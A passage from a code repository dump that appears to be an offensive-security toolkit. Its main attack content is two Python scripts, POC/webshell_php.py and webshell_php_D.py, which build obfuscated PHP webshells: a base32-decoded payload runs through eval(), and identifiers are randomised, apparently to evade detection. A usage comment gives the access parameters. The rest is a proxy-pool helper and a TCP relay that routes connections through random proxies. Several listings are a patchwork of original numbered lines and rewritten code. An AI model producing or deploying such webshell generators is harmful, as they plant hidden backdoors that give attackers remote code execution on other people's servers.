37 | var6 = random.choice(arr4)
38 | var7 = random.choice(arr5)
39 | var8 = random.choice(arr6)
40 | var9 = random.choice(arr7)
41 | var10 = random.choice(arr8)
42 | var11 = random.choice(arr9)
43 | var12 = random.choice(arr10)
44 | var13 = random.choice(arr11)
45 | var14 = random.choice(arr12)
46 | var15 = random.choice(arr13)
47 | shellc = shell.format(lef,rig,var1,var2,var3,var4,var5,var6,var7,var8,var9,var10,var11,var12,var13,var14,var15)
48 | return shellc
49 |
50 | def check(**kwargs):
51 | print (build_webshell())
52 | if __name__ == '__main__':
53 | print (build_webshell())
--------------------------------------------------------------------------------
/POC/webshell_php.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 | #use:GET:http://url?pass=pureqh POST:zero
6 |
7 | shell = '''{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
14 | $this->{3} = @{9}($this->{2});
15 | @eval({5}.$this->{3}.{5});
16 | {4}{4}{4}
17 | new {0}();
18 | function {6}(${7}){1}
19 | $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
20 | ${8} = '';
21 | $v = 0;
22 | $vbits = 0;
23 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
24 | $v <<= 8;
25 | $v += ord(${7}[$i]);
26 | $vbits += 8;
27 | while ($vbits >= 5) {1}
28 | $vbits -= 5;
29 | ${8} .= $BASE32_ALPHABET[$v >> $vbits];
30 | $v &= ((1 << $vbits) - 1);{4}{4}
31 | if ($vbits > 0){1}
32 | $v <<= (5 - $vbits);
33 | ${8} .= $BASE32_ALPHABET[$v];{4}
34 | return ${8};{4}
35 | function {9}(${7}){1}
36 | ${8} = '';
37 | $v = 0;
38 | $vbits = 0;
39 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
40 | $v <<= 5;
41 | if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
42 | $v += (ord(${7}[$i]) - 97);
43 | {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
44 | $v += (24 + ${7}[$i]);
45 | {4} else {1}
46 | exit(1);
47 | {4}
48 | $vbits += 5;
49 | while ($vbits >= 8){1}
50 | $vbits -= 8;
51 | ${8} .= chr($v >> $vbits);
52 | $v &= ((1 << $vbits) - 1);{4}{4}
53 | return ${8};{4}
54 | ?>'''
55 |
56 |
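def random_keys(len):
    """Return *len* distinct characters from a punctuation-and-letters pool.

    :param len: number of characters to draw (name kept for existing callers
        although it shadows the builtin inside this function)
    :return: a string of *len* unique characters; '' for len == 0
    :raises ValueError: if len exceeds the pool size (characters are drawn
        without replacement)
    """
    pool = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'  # was bound to the name str
    return ''.join(random.sample(pool, len))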
60 |
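def random_name(len):
    """Return *len* distinct uppercase ASCII letters in random order.

    :param len: number of letters to draw (parameter name kept for existing
        callers even though it shadows the builtin inside this function)
    :return: a string of *len* unique letters; '' for len == 0
    :raises ValueError: if len > 26, because letters are drawn without replacement
    """
    letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'  # local alphabet; the original shadowed str()
    return ''.join(random.sample(letters, len))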
64 |
def build_webshell():
    """Return the `shell` template with fresh random identifiers substituted.

    Slot mapping (see the template above, which this listing shows only in
    part): {0} class name, {2}/{3} property names, {6}/{9} the base32
    encode/decode function names, {7}/{8} their parameter and result
    variables, {1}/{4} literal braces, {5} a quoted junk comment built from
    random_keys.  Identifier text therefore changes on every call; the part
    that stays constant is the structure — a decode step feeding eval().
    """
    className = random_name(4)
    lef = '''{'''
    parameter1 = random_name(4)
    parameter2 = random_name(4)
    rig = '''}'''
    disrupt = "\"/*"+random_keys(7)+"*/\""
    fun1 = random_name(4)
    fun1_vul = random_name(4)
    fun1_ret = random_name(4)
    fun2 = random_name(4)
    shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
    return shellc
def check(**kwargs):
    """Framework entry point: print one generated template; *kwargs* are ignored."""
    print(build_webshell())
80 |
if __name__ == '__main__':
    # Manual run: emit a single rendering on stdout.
    rendered = build_webshell()
    print(rendered)
83 |
--------------------------------------------------------------------------------
/POC/webshell_php_D.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 | #use: POST:zero
6 |
7 | shell = '''{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
13 | $this->{3} = @{9}($this->{2});
14 | @eval({5}.$this->{3}.{5});
15 | {4}{4}
16 | new {0}();
17 | function {6}(${7}){1}
18 | $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
19 | ${8} = '';
20 | $v = 0;
21 | $vbits = 0;
22 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
23 | $v <<= 8;
24 | $v += ord(${7}[$i]);
25 | $vbits += 8;
26 | while ($vbits >= 5) {1}
27 | $vbits -= 5;
28 | ${8} .= $BASE32_ALPHABET[$v >> $vbits];
29 | $v &= ((1 << $vbits) - 1);{4}{4}
30 | if ($vbits > 0){1}
31 | $v <<= (5 - $vbits);
32 | ${8} .= $BASE32_ALPHABET[$v];{4}
33 | return ${8};{4}
34 | function {9}(${7}){1}
35 | ${8} = '';
36 | $v = 0;
37 | $vbits = 0;
38 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
39 | $v <<= 5;
40 | if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
41 | $v += (ord(${7}[$i]) - 97);
42 | {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
43 | $v += (24 + ${7}[$i]);
44 | {4} else {1}
45 | exit(1);
46 | {4}
47 | $vbits += 5;
48 | while ($vbits >= 8){1}
49 | $vbits -= 8;
50 | ${8} .= chr($v >> $vbits);
51 | $v &= ((1 << $vbits) - 1);{4}{4}
52 | return ${8};{4}
53 | ?>'''
54 |
55 |
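def random_keys(len):
    """Return *len* distinct characters from a punctuation-and-letters pool.

    :param len: number of characters to draw (name kept for existing callers
        although it shadows the builtin inside this function)
    :return: a string of *len* unique characters; '' for len == 0
    :raises ValueError: if len exceeds the pool size (characters are drawn
        without replacement)
    """
    pool = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'  # was bound to the name str
    return ''.join(random.sample(pool, len))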
59 |
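def random_name(len):
    """Return *len* distinct uppercase ASCII letters in random order.

    :param len: number of letters to draw (parameter name kept for existing
        callers even though it shadows the builtin inside this function)
    :return: a string of *len* unique letters; '' for len == 0
    :raises ValueError: if len > 26, because letters are drawn without replacement
    """
    letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'  # local alphabet; the original shadowed str()
    return ''.join(random.sample(letters, len))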
63 |
def build_webshell():
    """Return the `shell` template with fresh random identifiers substituted.

    Slot mapping (see the template above, which this listing shows only in
    part): {0} class name, {2}/{3} property names, {6}/{9} the base32
    encode/decode function names, {7}/{8} their parameter and result
    variables, {1}/{4} literal braces, {5} a quoted junk comment built from
    random_keys.  Identifier text therefore changes on every call; the part
    that stays constant is the structure — a decode step feeding eval().
    """
    className = random_name(4)
    lef = '''{'''
    parameter1 = random_name(4)
    parameter2 = random_name(4)
    rig = '''}'''
    disrupt = "\"/*"+random_keys(7)+"*/\""
    fun1 = random_name(4)
    fun1_vul = random_name(4)
    fun1_ret = random_name(4)
    fun2 = random_name(4)
    shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
    return shellc
77 |
def check(**kwargs):
    """Framework entry point: print one generated template; *kwargs* are ignored."""
    print(build_webshell())
if __name__ == '__main__':
    # Manual run: emit a single rendering on stdout.
    rendered = build_webshell()
    print(rendered)
--------------------------------------------------------------------------------
/POC/模板.py:
--------------------------------------------------------------------------------
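# Sample input: the two bytes 0xAC 0xED (presumably the Java serialization
# stream magic, given the deserialization tooling elsewhere in this repo — confirm).
inp = b'\xac\xed'


def to_bit_string(raw):
    """Return the big-endian binary digits of *raw* with no ``0b`` prefix.

    The original called ``int(raw, 16)``, which only accepts ASCII hex digits
    and raises ValueError on arbitrary bytes; ``int.from_bytes`` reads the
    raw value directly.  An empty input yields ``'0'``.

    :param raw: bytes to render
    :return: str of '0'/'1' characters, no leading zeros
    """
    return format(int.from_bytes(raw, 'big'), 'b')


print(to_bit_string(inp))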
--------------------------------------------------------------------------------
/Proxy/WebRequest.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: WebRequest
5 | Description : Network Requests Class
6 | Author : J_hao
7 | date: 2017/7/31
8 | -------------------------------------------------
9 | Change Activity:
10 | 2017/7/31:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'J_hao'
14 |
15 | from requests.models import Response
16 | from lxml import etree
17 | import requests
18 | import random
19 | import time
20 |
21 | from Proxy.handler.logHandler import LogHandler
22 |
23 | requests.packages.urllib3.disable_warnings()
24 |
25 |
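class WebRequest(object):
    """Small wrapper around ``requests``: retries, a random User-Agent and a
    few convenience accessors over the most recent response.

    Instances are stateful — ``get`` stores its result on ``self.response``
    and every accessor below reads that attribute.
    """
    name = "Web_Request"

    def __init__(self, *args, **kwargs):
        # Extra arguments are accepted for compatibility and ignored.
        self.log = LogHandler(self.name, file=False)
        self.response = Response()

    @property
    def user_agent(self):
        """
        Return one User-Agent string picked at random from a fixed list.
        :return: str
        """
        ua_list = [
            'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101',
            'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122',
            'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71',
            'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95',
            'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)',
            'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50',
            'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0',
        ]
        return random.choice(ua_list)

    @property
    def header(self):
        """
        Baseline request headers; a new dict on every access, so callers may
        mutate the result freely.
        :return: dict
        """
        return {'User-Agent': self.user_agent,
                'Accept': '*/*',
                'Connection': 'keep-alive',
                'Accept-Language': 'zh-CN,zh;q=0.8'}

    def get(self, url, header=None, retry_time=3, retry_interval=5, timeout=5, *args, **kwargs):
        """
        GET *url*, retrying on any exception.
        :param url: target url
        :param header: extra headers merged over :attr:`header` (non-dict values are ignored)
        :param retry_time: number of attempts before giving up
        :param retry_interval: seconds to sleep between attempts
        :param timeout: per-request network timeout handed to requests
        :return: self; on success ``self.response`` holds the reply, on give-up it is
            reset to an empty ``Response`` (status_code None) so a stale reply from an
            earlier call is never mistaken for this url's result
        """
        headers = self.header
        if header and isinstance(header, dict):
            headers.update(header)
        # Certificate verification is off by default because the checks run
        # through untrusted/self-signed proxies; callers that need an
        # authenticated peer pass verify=True (the old hard-coded verify=False
        # also raised TypeError whenever a caller supplied verify in kwargs).
        kwargs.setdefault('verify', False)
        attempts_left = retry_time
        while True:
            try:
                self.response = requests.get(url, *args, headers=headers, timeout=timeout, **kwargs)
                return self
            except Exception as e:
                self.log.error("requests: %s error: %s" % (url, str(e)))
                attempts_left -= 1
                if attempts_left <= 0:
                    self.response = Response()
                    return self
                self.log.info("retry %s second after" % retry_interval)
                time.sleep(retry_interval)

    def respheader(self, key):
        """
        Return response header *key*, or '' when it is absent (logged, not printed).
        :param key: header name (case-insensitive lookup, per requests)
        :return: str
        """
        try:
            return self.response.headers[key]
        except (KeyError, TypeError, AttributeError) as e:
            self.log.error("respheader %s: %s" % (key, str(e)))
            return ''

    @property
    def code(self):
        """
        Encoding declared in the body (meta/XML prolog) if any, else the one
        requests guesses from the bytes.
        :return: str
        """
        encodings = requests.utils.get_encodings_from_content(self.response.text)
        if encodings:
            return encodings[0]
        return self.response.apparent_encoding

    @property
    def tree(self):
        """lxml HTML tree of the last response, decoded with :attr:`code` (undecodable bytes dropped)."""
        return etree.HTML(self.response.content.decode(self.code, 'ignore'))

    @property
    def text(self):
        """Decoded body of the last response."""
        return self.response.text

    @property
    def json(self):
        """
        Parsed JSON body of the last response, or {} when it does not parse
        (requests raises a ValueError subclass for bad JSON).
        :return: dict/list
        """
        try:
            return self.response.json()
        except ValueError as e:
            self.log.error(str(e))
            return {}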
--------------------------------------------------------------------------------
/Proxy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/__init__.py
--------------------------------------------------------------------------------
/Proxy/handler/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: __init__.py
5 | Description :
6 | Author : JHao
7 | date: 2016/12/3
8 | -------------------------------------------------
9 | Change Activity:
10 | 2016/12/3:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | # from handler.ProxyManager import ProxyManager
16 |
--------------------------------------------------------------------------------
/Proxy/handler/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/handler/__pycache__/configHandler.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/configHandler.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/handler/__pycache__/logHandler.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/logHandler.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/handler/__pycache__/proxyHandler.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/proxyHandler.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/handler/configHandler.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: configHandler
5 | Description :
6 | Author : JHao
7 | date: 2020/6/22
8 | -------------------------------------------------
9 | Change Activity:
10 | 2020/6/22:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | import os
16 | import Proxy.proxySetting as setting
17 | from Proxy.util.singleton import Singleton
18 | from Proxy.util.lazyProperty import LazyProperty
19 | from Proxy.util.six import reload_six, withMetaclass
20 |
21 |
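class ConfigHandler(withMetaclass(Singleton)):
    """Runtime settings: every property reads an environment variable and
    falls back to the value in ``Proxy.proxySetting``; ``LazyProperty``
    caches each answer on the (singleton) instance.
    """

    def __init__(self):
        pass

    # serverHost / serverPort / dbConn / tableName / fetchers / proxyCheckCount /
    # maxFailRate were disabled in this fork.
    # NOTE(review): Proxy/helper/fetch.py still reads `self.conf.fetchers`, which
    # now raises AttributeError — confirm whether that property should come back.

    @staticmethod
    def _int_env(name, default):
        """Return int(os.environ[name]) when the variable is set, else *default* untouched.

        os.getenv hands back a str whenever the variable exists, so the numeric
        settings below would otherwise change type depending on the environment.
        """
        raw = os.getenv(name)
        return default if raw is None else int(raw)

    @LazyProperty
    def httpUrl(self):
        """URL fetched through a proxy to prove plain-HTTP connectivity."""
        return os.getenv("HTTP_URL", setting.HTTP_URL)

    @LazyProperty
    def httpsUrl(self):
        """URL fetched through a proxy to prove HTTPS connectivity."""
        return os.getenv("HTTPS_URL", setting.HTTPS_URL)

    @LazyProperty
    def verifyTimeout(self):
        """Timeout (seconds) for a single verification request; int when set via env."""
        return self._int_env("VERIFY_TIMEOUT", setting.VERIFY_TIMEOUT)

    @LazyProperty
    def maxFailCount(self):
        """Consecutive failures after which a proxy is dropped; int when set via env."""
        return self._int_env("MAX_FAIL_COUNT", setting.MAX_FAIL_COUNT)

    @LazyProperty
    def poolSizeMin(self):
        """Lower bound on the pool size; int when set via env."""
        return self._int_env("POOL_SIZE_MIN", setting.POOL_SIZE_MIN)

    @LazyProperty
    def timezone(self):
        """Timezone name used by the scheduler (string, passed through as-is)."""
        return os.getenv("TIMEZONE", setting.TIMEZONE)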
79 |
80 |
--------------------------------------------------------------------------------
/Proxy/handler/logHandler.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: LogHandler.py
5 | Description : 日志操作模块
6 | Author : JHao
7 | date: 2017/3/6
8 | -------------------------------------------------
9 | Change Activity:
10 | 2017/03/06: log handler
11 | 2017/09/21: 屏幕输出/文件输出 可选(默认屏幕和文件均输出)
12 | 2020/07/13: Windows下TimedRotatingFileHandler线程不安全, 不再使用
13 | -------------------------------------------------
14 | """
15 | __author__ = 'JHao'
16 |
17 | import os
18 | import logging
19 | import platform
20 |
21 | from logging.handlers import TimedRotatingFileHandler
22 | from logging import FileHandler
23 |
24 | # 日志级别
# Log levels — the same numeric values as the logging module's own constants,
# re-exported here so callers can pass e.g. LogHandler(name, level=INFO).
CRITICAL = logging.CRITICAL
FATAL = CRITICAL
ERROR = logging.ERROR
WARNING = logging.WARNING
WARN = WARNING
INFO = logging.INFO
DEBUG = logging.DEBUG
NOTSET = logging.NOTSET
33 |
CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))
ROOT_PATH = os.path.join(CURRENT_PATH, os.pardir)  # one level up: the package directory
LOG_PATH = os.path.join(ROOT_PATH, 'log')

# Make sure the log directory exists at import time.  Another process may
# create it between the check and the mkdir; that is not an error.
try:
    if not os.path.exists(LOG_PATH):
        os.mkdir(LOG_PATH)
except FileExistsError:
    pass
43 |
44 |
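class LogHandler(logging.Logger):
    """
    Logger with an optional stderr stream handler and an optional daily
    rotating file handler under LOG_PATH.
    """

    # Shared by both handlers; was duplicated verbatim in each setup method.
    _FORMAT = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s'

    def __init__(self, name, level=logging.DEBUG, stream=False, file=True):
        """
        :param name: logger name, also the file stem of <LOG_PATH>/<name>.log
        :param level: threshold for the logger and, by default, its handlers
            (logging.DEBUG == the module-level DEBUG constant)
        :param stream: attach a StreamHandler (stderr)
        :param file: attach the rotating file handler (platform-gated below)
        """
        self.name = name
        self.level = level
        logging.Logger.__init__(self, self.name, level=level)
        if stream:
            self.__setStreamHandler__()
        if file:
            # NOTE(review): the header changelog says TimedRotatingFileHandler is
            # avoided on Windows, yet this branch enables it *only* on Windows —
            # confirm which platform the file handler is meant for before changing.
            if platform.system() == "Windows":
                self.__setFileHandler__()

    def __setFileHandler__(self, level=None):
        """
        Attach a daily-rotating file handler writing <LOG_PATH>/<name>.log.
        :param level: handler threshold; falls back to the logger's level when
            falsy (so NOTSET/0 also means "inherit")
        :return:
        """
        file_name = os.path.join(LOG_PATH, '{name}.log'.format(name=self.name))
        # Rotate once a day into the log directory and keep 15 old files.
        # utf-8 is pinned because the messages include non-ASCII text and the
        # platform default (notably on Windows) is not guaranteed to hold it.
        file_handler = TimedRotatingFileHandler(filename=file_name, when='D', interval=1,
                                                backupCount=15, encoding='utf-8')
        file_handler.suffix = '%Y%m%d.log'
        file_handler.setLevel(level or self.level)
        file_handler.setFormatter(logging.Formatter(self._FORMAT))
        self.file_handler = file_handler
        self.addHandler(file_handler)

    def __setStreamHandler__(self, level=None):
        """
        Attach a StreamHandler on stderr.
        :param level: handler threshold; falls back to the logger's level when falsy
        :return:
        """
        stream_handler = logging.StreamHandler()
        stream_handler.setFormatter(logging.Formatter(self._FORMAT))
        stream_handler.setLevel(level or self.level)
        self.addHandler(stream_handler)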
95 |
96 |
if __name__ == '__main__':
    # Smoke test: build a logger and emit one INFO line.
    demo = LogHandler('test')
    demo.info('this is a test msg')
--------------------------------------------------------------------------------
/Proxy/handler/proxyHandler.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # from hutaow
3 | import sys
4 | import socket
5 | import logging
6 | import threading
7 | import random
local_ip = '127.0.0.1'  # loopback only: the relay is not reachable from other hosts
local_port = 10086
PKT_BUFF_SIZE = 2048  # bytes per recv() in the relay workers

# Logging: everything at DEBUG and above goes to stderr with a timestamped prefix.
logger = logging.getLogger("Proxy Logging")
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter(
    '%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s',
    '%Y %b %d %a %H:%M:%S',
)
stream_handler = logging.StreamHandler(sys.stderr)
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
18 |
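def tcp_mapping_worker(conn_receiver, conn_sender):
    """Copy bytes from conn_receiver to conn_sender until EOF or an error on either side.

    Both sockets are closed however the loop ends.  Peer names are resolved
    once up front: the original called getpeername() after every chunk, which
    raises OSError as soon as the peer has gone away and left both sockets open.

    :param conn_receiver: connected socket to read from
    :param conn_sender: connected socket to write to
    :return: None
    """
    def _peer(sock):
        # Best-effort label for the log line only.
        try:
            return sock.getpeername()
        except OSError:
            return '?'

    src, dst = _peer(conn_receiver), _peer(conn_sender)
    try:
        while True:
            try:
                data = conn_receiver.recv(PKT_BUFF_SIZE)
            except Exception:
                print('Connection closed.')
                break
            if not data:
                print('No more data is received.')
                break
            try:
                conn_sender.sendall(data)
            except Exception:
                print('Failed sending data.')
                break
            print('Mapping > %s -> %s > %d bytes.' % (src, dst, len(data)))
    finally:
        conn_receiver.close()
        conn_sender.close()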
38 |
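def tcp_mapping_request(local_conn, remote_ip, remote_port, retries=3):
    """Connect to remote_ip:remote_port and start the two relay threads.

    :param local_conn: accepted client socket
    :param remote_ip: upstream proxy address
    :param remote_port: upstream port; coerced with int() because switchPro()
        passes the str it split out of "ip:port"
    :param retries: connection attempts before giving up.  The original
        looped forever, spinning and leaking one unconnected socket per
        attempt; on give-up the client socket is now closed so the caller
        sees EOF instead of a silent hang.
    :return: None
    """
    port = int(remote_port)
    for _ in range(retries):
        remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            # NOTE(review): this 3 s timeout stays on the socket after connect(),
            # so the relay worker's recv() also gives up after 3 s idle — confirm
            # whether that is intended or settimeout(None) should follow connect().
            remote_conn.settimeout(3)
            remote_conn.connect((remote_ip, port))
        except Exception:
            print('Unable to connect to the remote server.')
            remote_conn.close()
            continue
        threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start()
        threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start()
        return
    local_conn.close()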
52 |
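def switchPro(proxylist):
    """Accept on local_ip:local_port and relay each client through a random proxy.

    :param proxylist: "ip:port" strings (read from an untrusted file elsewhere);
        one is picked at random per accepted connection
    :return: None — runs until accept() fails or an entry cannot be split;
        the listening socket is closed on every exit path
    """
    local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        local_server.bind((local_ip, local_port))
        local_server.listen(5)
        print('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')

        while True:
            try:
                (local_conn, local_addr) = local_server.accept()
                proxyip = random.choice(proxylist)
                print("[!]Now proxy ip:" + str(proxyip))
                prip, prpo = proxyip.split(":")
                # The split port is a str; convert here so connect() gets an int
                # (a bad entry stops the service, like any other error above).
                prpo = int(prpo)
            except Exception:
                print('Stop mapping service.')
                break
            threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start()
            print('Receive mapping request from %s:%d.' % local_addr)
    finally:
        local_server.close()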
73 |
74 |
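def Loadips(path='ips.txt'):
    """Read "ip:port" lines from *path* and return a list of (ip, port) tuples.

    :param path: proxy list file; defaults to ips.txt in the working directory
        (the original hard-coded that name)
    :return: list of (str, int); blank lines are skipped
    :raises ValueError: on a line without exactly one ':' or a non-numeric port

    The port is parsed with int().  The original used eval() on the file
    content, which executes whatever the file contains — a data file must not
    be able to run code.
    """
    ip_list = []
    with open(path) as ips:
        for line in ips:
            line = line.strip()
            if not line:
                continue
            host, port = line.split(":")
            ip_list.append((host, int(port)))
    return ip_list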
86 |
if __name__ == '__main__':
    # Standalone mode: load the proxy list and run the accept loop inline
    # (mirrors switchPro, but logs through `logger` and takes (ip, port) tuples).
    proxies = Loadips()
    print(proxies)
    local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    local_server.bind((local_ip, local_port))
    local_server.listen(5)
    logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')
    while True:
        try:
            local_conn, local_addr = local_server.accept()
            proxyip = random.choice(proxies)
            print("[!]Now proxy ip:" + str(proxyip))
            prip, prpo = proxyip
        except Exception:
            local_server.close()
            logger.debug('Stop mapping service.')
            break
        threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start()
        logger.debug('Receive mapping request from %s:%d.' % local_addr)
--------------------------------------------------------------------------------
/Proxy/helper/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__init__.py
--------------------------------------------------------------------------------
/Proxy/helper/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/helper/__pycache__/check.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/check.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/helper/__pycache__/proxy.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/proxy.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/helper/__pycache__/validator.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/validator.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/helper/check.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: check
5 | Description : 执行代理校验
6 | Author : JHao
7 | date: 2019/8/6
8 | -------------------------------------------------
9 | Change Activity:
10 | 2019/08/06: 执行代理校验
11 | 2021/05/25: 分别校验http和https
12 | -------------------------------------------------
13 | """
14 | __author__ = 'JHao'
15 |
16 | from Proxy.util.six import Empty
17 | from threading import Thread
18 | from datetime import datetime
19 | from Proxy.handler.logHandler import LogHandler
20 | from Proxy.helper.validator import ProxyValidator
21 | from Proxy.handler.configHandler import ConfigHandler
22 | import threading
23 |
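class DoValidator(object):
    """ Run the registered validator functions against a proxy and update its bookkeeping. """

    @classmethod
    def validator(cls, proxy):
        """
        Validation entry point.
        Args:
            proxy: Proxy Object
        Returns:
            Proxy Object — the same instance, with check_count, last_time,
            last_status, fail_count and https updated in place
        """
        http_r = cls.httpValidator(proxy)
        # HTTPS is only probed once plain HTTP works.
        https_r = cls.httpsValidator(proxy) if http_r else False

        proxy.check_count += 1
        proxy.last_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        proxy.last_status = bool(http_r)
        if http_r:
            if proxy.fail_count > 0:
                proxy.fail_count -= 1
            proxy.https = bool(https_r)
        else:
            proxy.fail_count += 1
        return proxy

    @classmethod
    def http_or_https(cls, proxy, anonymous=False):
        """Run one validator family, chosen from the proxy's advertised type."""
        if anonymous:
            cls.anonymousValidator(proxy)
            return
        # httpValidator/httpsValidator leave the str 'HTTP'/'HTTPS' in proxy._https,
        # but a freshly built Proxy holds the bool False there and `'HTTPS' in False`
        # raises TypeError — apply the substring test to strings only.
        advertised = proxy.https
        if isinstance(advertised, str) and ('HTTPS' in advertised or '支持' in advertised):
            cls.httpsValidator(proxy)
        else:
            cls.httpValidator(proxy)

    @classmethod
    def _run_all(cls, funcs, proxy, label=None):
        """Apply *funcs* in order; the first rejection clears last_status and returns False.

        :param label: when given, stored in proxy._https on success
        """
        for func in funcs:
            if not func(proxy):
                proxy.last_status = None
                return False
        if label is not None:
            proxy._https = label
        return True

    @classmethod
    def httpValidator(cls, proxy):
        """True when every http_validator accepts *proxy* (then tags it 'HTTP')."""
        return cls._run_all(ProxyValidator.http_validator, proxy, 'HTTP')

    @classmethod
    def httpsValidator(cls, proxy):
        """True when every https_validator accepts *proxy* (then tags it 'HTTPS')."""
        return cls._run_all(ProxyValidator.https_validator, proxy, 'HTTPS')

    @classmethod
    def preValidator(cls, proxy):
        """True when every pre_validator accepts *proxy*.

        Called by Proxy/helper/fetch.py with the bare "ip:port" string rather
        than a Proxy object, so nothing may be assigned on *proxy* here (the
        original set proxy.last_status and would have raised AttributeError
        on the first rejected candidate).
        """
        for func in ProxyValidator.pre_validator:
            if not func(proxy):
                return False
        return True

    @classmethod
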